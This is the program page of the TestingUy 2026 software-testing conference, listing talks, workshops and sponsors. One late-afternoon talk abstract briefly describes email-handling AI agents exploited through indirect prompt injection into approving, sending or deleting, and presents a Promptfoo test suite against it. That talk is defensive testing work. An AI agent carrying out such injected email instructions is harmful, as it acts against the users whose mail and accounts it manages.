2026 Edition

April 15th online – April 16th in Montevideo, Uruguay

TestingUy 2026

On April 15th and 16th, the twelfth edition of TestingUy will take place: an event for testers, developers, analysts, designers, product owners, managers, and anyone interested in software testing and quality.

On Day 1, eleven activities will take place fully online, and on Day 2 we will meet at the Torre de las Telecomunicaciones to enjoy thirteen sessions with local and international leaders from the testing world, plenty of networking, and more.

Access is free for all attendees, and the agenda and registration are now available! Follow us on social media so you don't miss any updates.

Call for speakers

Final call! Submit an activity by July 20.

TestingUy has been declared of national interest by the following organizations:

ANII
Ministerio de Educación y Cultura
Presidencia de la República
Uruguay Technology

Two days all about testing!

Speakers from ten countries, with a strong emphasis on Latin America, will be present across the 24 activities taking place this year: two keynotes, four workshops, one panel, two open spaces, and fifteen talks.

The program covers areas including AI, automation, performance, security, UX, accessibility, architecture, risk-based testing, and essential power skills, targeting a wide audience with diverse levels of expertise.

Take a look at the agenda and secure your spot

Agenda for day 1 - online

ACTIVITIES

April 15 – Online

10:00 - 10:05

WELCOME

Aníbal Banquero (CES), Guillermo Skrilec (QAlified), Gustavo Guimerans (CES), Yanaina López (QAlified)

10:05 - 10:50 | Activity in English

KEYNOTE: The Ahh Test

Rosie Sherry

The world is changing and we need new ways to think about what it means to ship a good product. The models of the past have helped us get to where we are, but when the world is in flux and chaos, what does it mean for the people who are building?

As quality people, we are challenged:
– we know we need to shift-left, right and everywhere
– most of us adopt our own version of being agile-ish
– test automation has shifted to developers and AI
– systems thinking is essential to understand the unavoidable complexity we face
– we need to find confidence to make the best decisions possible

I’d like to introduce you to the Ahh Test: something we’ve been experimenting with internally within the MoTaverse to make decisions on what to build.

Whenever we want to build something, we ask whether it passes that Ahh Test. This is something anyone in the team can contribute to. In any meeting. In any Slack message. In any rant, personal thought or customer feedback.

If it doesn’t pass the Ahh Test, we shouldn’t build it, because it will only shift problems further down the line.

Join this session to learn:
– What the Ahh Test is
– Why it matters
– Practical ideas and tactics for adopting it

10:55 - 11:25

TALK: From Tester to Quality Engineer in the age of AI

Daniella Andrea Rojas Pacheco

Artificial intelligence is transforming the way we develop software… and the role of the tester as well.

Today, the challenge is no longer just about executing tests or automating scenarios, but about integrating quality from the very beginning, participating in technical decisions, and using AI as a strategic ally. In this context, the transition from tester to Quality Engineer is not just a change in title, but a shift in mindset.

In this talk, we will explore how GenAI is redefining traditional tasks, what opportunities it creates to enhance testers’ productivity and creativity, and which technical and human skills are becoming critical in this new stage.

I will share practical approaches to incorporating AI with purpose, without losing judgment or professional responsibility, and how to evolve from validating deliverables to co-creating value within agile teams.

Because in the age of AI, quality is not a phase of the process. It is a shared strategy.

10:55 - 13:10

OPEN LAB: ArtificialQA: Learn how to test AI agents in a guided, hands-on session

Natalia Nario, Guzmán Pieroni

Discover and try out a tool designed to evaluate the quality of conversational agents. We’ll show you how to connect an agent, define test cases, run automated tests, and assess responses using intelligent evaluators.

11:30 - 12:00

TALK: AI agents for testing: Automatic generation of BDD tests from heterogeneous sources

Beatriz Pérez, Eneko Pizarro

Web testing is essential for validating applications end-to-end, from the user interface to the backend. However, creating and maintaining these tests is costly. Before the rise of AI, our approach consistently followed the same path: tests that are easy for users to understand, written in natural language using Behaviour Driven Development (BDD), where Gherkin is used as the test specification language (very close to natural language), along with maintainable code following patterns such as the Page Object Model (POM).

However, writing tests in natural language for end users remains costly, and maintenance is still challenging as tests quickly become outdated with UI changes. Our proposal leverages generative AI and agents to support the creation and maintenance of E2E tests in the following ways:
– Automatically generates test specifications in Cucumber Gherkin from heterogeneous sources such as manuals, videos, meeting notes, and the application itself
– Automates implementation through code (currently in Java/Selenium, with an architecture extensible to Cypress and Playwright)
– Reviews UI changes to suggest improvements to existing test cases
– Integrates into your testing project through the MCP protocol

We will present our approach, which has been validated through case studies and a real industrial project. We will also discuss challenges, encountered issues, and future work.

12:05 - 12:35

OPEN SPACE by Testing Channel TV

Gastón Marichal, Marcos Manicera

12:40 - 13:10

TALK: Hardhat and quality in smart contracts

Matías Magni

In Web3, a code error means a permanent loss. This technical session explores how to use Hardhat to build robust, secure, and efficient smart contracts.

We will cover the professional workflow from local development to deployment: you’ll learn how to perform advanced debugging, run full-coverage tests, and automate security analysis using tools like Slither. We’ll also look at how to optimize gas consumption and ensure code auditability.

A practical, straightforward guide for developers and QAs looking to raise their engineering standards and protect their protocols against critical vulnerabilities. Quality is not optional; it is your best line of defense.

13:10 - 14:00

LUNCH - FREE TIME

14:00 - 14:30

TALK: Web performance principles: How to speed up eCommerce to improve conversion and experience

Maximiliano Vázquez

In today’s digital ecosystem, where competition is just a click away, web performance has become a critical factor for the success of any eCommerce site. This talk explores the key principles of web performance, covering both technical foundations and their direct impact on conversion, search ranking, and user retention.

We will present the most effective tools for measuring and diagnosing performance issues, with a focus on how to interpret results and prioritize improvements. We will also analyze the factors that most influence user experience, from initial load to full interaction, applied to real-world digital commerce scenarios.

With a practical perspective backed by more than nine years of experience optimizing high-traffic websites, this talk aims to provide clarity, focus, and actionable tools for teams looking to take their performance to the next level.

14:35 - 15:05

TALK: REST API Testing with the JUDO Framework

Felipe Farías

JUDO is a new framework that makes it easy to build REST API tests using Gherkin, without writing code or complex logic. It brings to Python the simplicity of the well-known Karate Framework for Java.

In this talk, you’ll learn what it’s about, how it can simplify your REST API testing, and explore some of its most useful features and capabilities.

15:10 - 15:40

PANEL: Latin America Tests: Communities, challenges, and the future

Moderators: Aníbal Banquero, Yanaina López | Panelists: Karla Mata, Rubén Aguirre, Marcela Mellado, Alexis Herrera, Angie Massiel

In this panel, representatives from different software testing communities across Latin America will share insights into the history and organization of their respective events, collaboration between communities, and the key challenges facing the discipline moving forward.

Communities from Bolivia, Chile, Colombia, Costa Rica, Venezuela, and Uruguay will take part.

15:45 - 16:15

TALK: Beyond the UI: Testing complex business logic in enterprise systems

Karen Joselin Morales Carreño

In business systems, such as payroll, tax, and finance platforms, many defects are not visual but logical. A screen may look correct because the UI is what we see and review, and sometimes all we focus on, while the underlying business rules silently produce incorrect financial results.

This session explores how fundamental testing principles apply to complex real-world workflows. Through case studies involving tax calculation errors, payroll overtime errors, and misleading system behavior, we will examine real-world examples of how testers can go beyond superficial validation and adopt risk-based and logic-based testing approaches.
Our work as quality engineers goes beyond the surface, and in many cases requires deep knowledge of calculations, taxes, and other domain rules.
Attendees will learn practical techniques for validating business rules, detecting hidden financial risks, and improving defect quality in complex environments.

16:20 - 17:00

CLOSING TALK: Beyond the symptom: Debugging for testers

Nadia Cavalleri

As a psychologist, I know it’s important not to stop at the symptom. As a tester, the same applies. This session will explore tools and techniques for debugging defects and moving from “it doesn’t work” to understanding why it fails.

Agenda for day 2 - in person

ACTIVITIES

April 16 – Torre de las Telecomunicaciones

9:00 - 9:45

CHECK-IN AND BREAKFAST

9:45 - 10:00 | Conference hall: Mario Benedetti

WELCOME

Aníbal Banquero (CES), Guillermo Skrilec (QAlified), Mariana Travieso (CES), Yanaina López (QAlified)

10:00 - 10:45 | Conference hall: Mario Benedetti

KEYNOTE: Autonomous fleets, unstoppable teams: The dawn of the agentic era

Carlos Gauto

Imagine a world where tests are not written: they are discovered, adapted, and continuously improved on their own. Where human teams stop fighting complexity and start striving for excellence. Where speed, coverage, and intelligence have no limits because they no longer depend on your time or constant attention.

That world becomes possible when you master Context Engineering, the key capability that transforms fragile prompts into truly autonomous agents aligned with business goals.

That world is no longer science fiction. It is the Agentic Era. And it’s not something that will happen to you, it’s something you can build, lead, and turn into an irreversible competitive advantage.

10:50 - 11:30 | Conference hall: Mario Benedetti

TALK: Measuring isn't free (and sometimes it's very expensive)

Mariana Travieso, María Elisa Presto

In software, we use many metrics to track projects, products, and teams: defects, coverage, progress, productivity, incidents, among others. In theory, these numbers help us understand how the work is progressing and the state of the product.

But measuring isn’t free. It requires time to collect data, maintain tools, produce reports, and explain results. And sometimes it can be costly: when metrics become targets, results can be forced, teams may optimize for the numbers instead of understanding the product, or even make poor decisions based on data that doesn’t tell the full story.

Many testers (especially those just starting out) join teams where metrics are already in place, and those metrics end up shaping how testing is done. Through real examples, some close to horror stories and others success cases, this talk invites us to look at testing within the system where it happens: teams, practices, goals, and incentives. The idea is to broaden perspectives and reflect on what we measure, why we measure it, and when measurement truly helps… and when it may cost more than it seems.

10:50 - 12:40 | Room: Idea Vilariño

WORKSHOP: From bug to purpose: Building a culture of quality

Johana Ríos, Gastón Cabana

In a technical industry where we often prioritize tools and metrics, we sometimes forget the engine that sustains (or undermines) quality: people. A critical production bug is rarely just a coding error; it is often the symptom of an avoided conversation, a lack of clear purpose, or a diffuse system of accountability. This workshop offers a strategic pause to look at what lies behind the bugs.

Through a methodology that integrates transformational leadership, NLP, and organizational psychology, we will move from individual reflection to systemic action. We will analyze real cases to understand how psychological safety and intrinsic motivation directly impact the final product, turning continuous improvement from a theoretical concept into a shared mindset.

The goal is for each participant to go beyond “doing testing” and start focusing on quality. Attendees will take away concrete tools that can be applied immediately within their teams. This is an invitation to lead a mindset shift, connecting technical processes with the human factor that truly gives them meaning.

11:35 - 11:55 | Conference hall: Mario Benedetti

Reliving 12 years of pure testing with TestingChannelTV

Gastón Marichal, Marcos Manicera

12:00 - 12:40 | Conference hall: Mario Benedetti

TALK: Don't trust AI (until you test it)

Natalia Nario, Guzmán Pieroni

How reliable is an AI that evaluates another AI? When models share biases and limitations, the risk of incorrect validations is real. It’s the modern version of “who watches the watchers?” applied to testing.

In this talk, we explore how to calibrate AI evaluators, and why humans remain essential at every step. AI can suggest, but the final judgment is still ours.

This isn’t about AI replacing testers. It’s about testers evolving to validate increasingly complex systems.

12:40 - 14:10

LUNCH - FREE TIME

14:10 - 14:40 | Conference hall: Mario Benedetti

TALK: After all this time automating… why haven't we made it work yet?

Javier Re

After years of investing in automation, many teams still face the same challenges: hard-to-maintain test suites, low confidence in results, and limited real impact on product quality.

So the question becomes inevitable: why haven’t we made it work yet?

This talk proposes a shift in perspective: understanding that automation doesn’t fail because of the tools, but because of how it is integrated into the team’s way of working. Based on industry evidence (World Quality Report, ISTQB, DORA), we will analyze key factors such as shared ownership, risk-based prioritization, and effective integration into the development workflow.

Building on these concepts, a practical approach is presented to improve automation adoption, focusing on design decisions, pipeline integration, and collaboration across roles.

The role of artificial intelligence is also explored as an enabler in this context. Rather than replacing strategy, AI can help reduce friction in tasks such as test generation, maintenance, and analysis, especially in environments where the pace of software change continues to accelerate.

The talk combines industry evidence with practical experience and is aimed at teams that already use automation but are looking to achieve more consistent and sustainable results.

14:10 - 15:50 | Room: Idea Vilariño

WORKSHOP: Build your first testing agent with Tero (open source)

Federico Toledo, Roger Abelenda

Artificial intelligence is already part of a tester’s daily work, but it is often limited to isolated prompts that are not integrated into the team’s workflow. In this workshop, we will go a step further: we will build an AI testing agent from scratch, no coding required, using Tero, an open-source platform for designing, sharing, and running agents.

We will start from common testing challenges to design an agent with a clear purpose, such as understanding or generating documentation, creating diagrams from code, deriving test cases from exploratory testing notes, or supporting automation. You will learn how to define its behavior, provide context and domain knowledge through documentation (RAG), and connect it to external tools via MCP so it can not only “respond” but also take action and produce meaningful results.

During the workshop, we will build an agent together and test it with real use cases while iterating and refining it. The focus is not on the tool itself, but on the mindset: how to design agents that amplify the impact of testing, make quality visible, and integrate AI in a practical and responsible way into everyday work.

You will leave with a solid foundation to create your own agents and start using them right away.

14:45 - 15:15 | Conference hall: Mario Benedetti

TALK: Inclusion and diversity through testing

Daniel Rojas, Juan Pablo Aguirre

In a world where software shapes experiences, decisions, and access, testers carry a responsibility that goes beyond the technical. Are we testing just to make things “work,” or to make them work for everyone?

This talk offers a thoughtful and practical perspective on how testing can (and should) uncover biases, exclusions, and barriers that often go unnoticed during development. From forms that assume your gender to apps that overlook visual accessibility, the most critical issues are not always the ones that throw exceptions.

We will share real cases where testing played a key role in preventing reputational damage, user loss, or direct discrimination. We will also explore how to test with empathy, what questions to ask, and how to bring these topics into conversations with Product, Design, and Development, without being seen as “the one who complicates things.”

You don’t need to be an expert in inclusion. You just need the willingness to open your eyes. Because sometimes, the worst bug is the one that doesn’t affect you, and that’s why you didn’t see it.

An invitation to test not only with criteria, but also with awareness.

15:20 - 15:50 | Conference hall: Mario Benedetti

TALK: Neutrotest: Testing beyond Pass/Fail with neutrosophic assertions

Osmanys Pérez

Traditional testing frameworks are limited to binary outcomes: PASS or FAIL. But many real-world scenarios are more nuanced—services operating at the edge of expected response times, values close to a threshold, or texts that are “similar enough.” With binary assertions, all these subtleties remain hidden.

Neutrotest is an experimental Java assertion library that introduces neutrosophic logic into testing. Each verification is modeled across three dimensions: truth, indeterminacy, and falsity (T, I, F). The result remains a traditional test outcome (PASS/FAIL) and integrates seamlessly into CI pipelines, but it also generates additional classifications such as FRAGILE_PASS (a success close to failure) and BORDERLINE_FAIL (a failure close to success). This allows teams to understand not just whether a test passed, but by what margin. It integrates with JUnit 5 through a custom extension and API, includes a demo module, and can expose T, I, F values along with the associated classification (Neutrosophic Status) in reporting tools like Allure.

In this talk, we will walk through how it works with concrete examples: fuzzy assertions for numerical values, text, timing, and exceptions. We will also explore how to configure different contexts (strict, lenient, exploratory) and how to interpret results in Allure. The goal is to demonstrate a practical way to incorporate uncertainty into test analysis, without leaving the ecosystem of tools we already use.
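The FRAGILE_PASS / BORDERLINE_FAIL idea can be sketched outside the library. Below is a minimal conceptual illustration in Python (not the Neutrotest Java API; the function name, tolerance model, and thresholds are assumptions) of how a measurement near a limit can be mapped to truth, indeterminacy, and falsity degrees plus a graded verdict:

```python
# Conceptual sketch of neutrosophic test classification.
# NOT the Neutrotest API: classify(), the tolerance band, and the
# normalization scheme are illustrative choices, not the library's.

def classify(value, limit, tolerance):
    """Classify a measurement against a limit with a tolerance band.

    Returns (verdict, truth, indeterminacy, falsity), with the three
    degrees normalized to sum to 1.0. Values well under the limit are
    a clean PASS; just under it, FRAGILE_PASS; just over, BORDERLINE_FAIL.
    """
    margin = (limit - value) / tolerance  # > 0 means under the limit
    if margin >= 1:
        return "PASS", 1.0, 0.0, 0.0
    if margin <= -1:
        return "FAIL", 0.0, 0.0, 1.0
    # Inside the tolerance band: partial truth/falsity, some indeterminacy
    truth = (margin + 1) / 2
    falsity = 1.0 - truth
    indeterminacy = 1.0 - abs(margin)  # highest exactly at the limit
    total = truth + indeterminacy + falsity
    truth, indeterminacy, falsity = truth / total, indeterminacy / total, falsity / total
    verdict = "FRAGILE_PASS" if value <= limit else "BORDERLINE_FAIL"
    return verdict, truth, indeterminacy, falsity

# A 480 ms response against a 500 ms limit with a 50 ms band:
print(classify(480, 500, 50)[0])  # FRAGILE_PASS
print(classify(300, 500, 50)[0])  # PASS
print(classify(520, 500, 50)[0])  # BORDERLINE_FAIL
```

The key point the talk makes survives the simplification: the CI pipeline still sees a binary outcome, while the T, I, F values and the graded verdict tell the team by what margin the test passed.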

15:50 - 16:30

COFFEE BREAK

16:30 - 17:00 | Conference hall: Mario Benedetti

TALK: The false sense of quality: When everything is covered but something feels off

Roxana Falco

In recent years, development teams have adopted more practices, tools, and automation than ever before. We talk about metrics, coverage, pipelines, and more recently, artificial intelligence applied to testing. And yet, many of the quality issues we face remain the same.

This talk offers a reflective perspective: what if the problem isn’t a lack of testing, but an excess of confidence? Confidence in executed tests, in reassuring metrics, and in tools—including AI—that promise to cover risks.

Drawing from real experiences, we will explore how this confidence can create a false sense of control and shift reliance away from human judgment. This talk invites us to rethink the role of testers as agents of healthy skepticism, capable of pausing and asking the right questions, even when everything seems to be working fine.

16:30 - 17:35 | Room: Idea Vilariño

WORKSHOP: I found a bug, now what? Effective communication for testers

Aníbal Banquero

Finding a bug is just the beginning. This workshop explores how testers can communicate clearly, choose the right channel, and ensure their findings drive real impact.

17:05 - 17:35 | Conference hall: Mario Benedetti

TALK: Testing so my agents don't go rogue

Sebastián Passaro

Agent-based systems don’t just produce text: they take action. And when they fail, it’s not just “a sentence” that fails, but a decision, which can trigger unexpected side effects (approving, sending, deleting, tagging).

In this session, I’ll move beyond abstraction and theory to present a real case of agent-based systems operating over emails, how they can be exploited through indirect prompt injections, and how to turn that risk into a repeatable testing suite using Promptfoo: fixed cases, controlled inputs, and direct evaluation of agent outputs (actions/traces), validating invariant conditions in a deterministic layer, even when responses vary.

All of this will be shown by comparing a vulnerable version and a fixed version of the same system. The goal is for you to take away something practical and directly applicable to your work or personal projects.
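The "deterministic layer" idea, checking invariants over what the agent did rather than what it said, can be sketched independently of Promptfoo. The Python below is an illustration under assumed names (the action vocabulary, trace shape, and helper function are hypothetical, not part of any real system):

```python
# Illustrative sketch of a deterministic invariant layer over an agent's
# action trace. Action names, trace format, and recipients are hypothetical.

FORBIDDEN_ACTIONS = {"delete_email", "forward_external"}

def violates_invariants(trace, approved_recipients):
    """Return the invariant violations found in an agent action trace.

    `trace` is a list of dicts like {"action": "send_email", "to": "..."}.
    The checks are deterministic: they inspect the actions the agent took,
    so they hold even when the natural-language responses vary run to run.
    """
    violations = []
    for step in trace:
        action = step.get("action")
        if action in FORBIDDEN_ACTIONS:
            violations.append(f"forbidden action: {action}")
        if action == "send_email" and step.get("to") not in approved_recipients:
            violations.append(f"send to unapproved recipient: {step.get('to')}")
    return violations

# A trace a prompt-injected agent might produce:
trace = [
    {"action": "read_email", "id": "42"},
    {"action": "send_email", "to": "attacker@evil.example"},
    {"action": "delete_email", "id": "42"},
]
print(violates_invariants(trace, approved_recipients={"boss@corp.example"}))
```

Run against the vulnerable version of a system, a check like this fails on the injected send and delete; against the fixed version, the same fixed cases and controlled inputs pass.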

17:40 - 18:25 | Conference hall: Mario Benedetti

TALK: When the load generator becomes the bottleneck

Delvis Echeverría

In performance testing, the real bottleneck is sometimes not your application but the load generator. When the generator itself is under stress, its own CPU and memory spikes contaminate the measurements, making results difficult to interpret.

In this talk, I review the evolution of load generators (processes → threads → event-driven) and present a controlled experiment using the same scenario, comparing three models, including a plan-based generator I’ve been working on.
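To make the process → thread → event-driven progression concrete, here is a minimal event-driven sketch in Python's asyncio (the request function is a stand-in; this is not the speaker's generator, just an illustration of the model):

```python
# Minimal sketch of an event-driven load generator: one thread, many
# in-flight requests. fake_request is a stand-in for a real HTTP call.
import asyncio
import time

async def fake_request(latency=0.01):
    # Replace with an aiohttp/httpx call in practice.
    await asyncio.sleep(latency)
    return 200

async def event_driven_load(total_requests, concurrency):
    """Fire total_requests with at most `concurrency` in flight at once.

    A semaphore caps concurrency, so a single process can keep thousands
    of requests in flight without one OS thread per virtual user, which
    is where process- and thread-based generators start to saturate.
    """
    sem = asyncio.Semaphore(concurrency)

    async def one():
        async with sem:
            return await fake_request()

    start = time.perf_counter()
    results = await asyncio.gather(*(one() for _ in range(total_requests)))
    return len(results), time.perf_counter() - start

count, elapsed = asyncio.run(event_driven_load(200, concurrency=50))
print(count, round(elapsed, 2))
```

The same scenario written with one thread (or process) per virtual user would spend the generator's resources on scheduling rather than on load, which is exactly the contamination the talk measures.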

18:25 - 18:45 | Conference hall: Mario Benedetti

SWEEPSTAKES AND CLOSING

Aníbal Banquero (CES), Yanaina López (QAlified)

19:30 - 21:30 | ThePutaMadre Bar

AFTER PARTY!

Sponsored by

GOLD Sponsors

ACTotal
CPA Ferrere
Relámpago

SILVER Sponsors

Abstracta
BIOS
Brightest
Crowdar
Kualitee
Pyxis
Uy Group

VENUE Sponsor

Antel

MEDIA Sponsors

Adolfo Blanco
DJ Academy
Kiwi Films
TestingChannelTV

Supported by

Organized by

Hosts


Aníbal Banquero


Yanaina López

Collaborators

Ana Inés González Lamé

Diego Gawenda

Facundo de Battista

Ursula Bartram

Copyright ©2025 TestingUy. All Rights Reserved